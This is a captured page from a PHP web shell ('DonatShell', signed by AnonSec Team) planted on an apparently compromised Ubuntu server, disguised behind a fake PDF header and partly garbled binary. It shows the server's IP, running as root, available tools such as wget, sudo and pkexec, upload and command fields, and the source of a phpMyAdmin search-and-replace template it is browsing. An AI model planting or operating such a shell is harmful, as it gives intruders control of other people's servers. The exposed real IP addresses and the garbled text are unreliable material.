%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/11584/root/usr/share/phpmyadmin/templates/table/search/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/11584/root/usr/share/phpmyadmin/templates/table/search/search_and_replace.phtml
<?php echo __('Find:'); ?>
<input type="text" value="" name="find" required />
<?php echo __('Replace with:'); ?>
<input type="text" value="" name="replaceWith" required />

<?php echo __('Column:'); ?>
<select name="columnIndex">
    <?php for ($i = 0, $nb = count($columnNames); $i < $nb; $i++): ?>
        <?php $type = preg_replace('@\(.*@s', '', $columnTypes[$i]); ?>
        <?php if ($GLOBALS['PMA_Types']->getTypeClass($type) == 'CHAR'): ?>
            <?php $column = $columnNames[$i]; ?>
            <option value="<?php echo $i; ?>">
                <?php echo htmlspecialchars($column); ?>
            </option>
        <?php endif; ?>
    <?php endfor; ?>
</select>

<br>
<?php echo PMA_Util::getCheckbox(
    'useRegex',
    __('Use regular expression'),
    false,
    false,
    'useRegex'
); ?>

Anon7 - 2022
AnonSec Team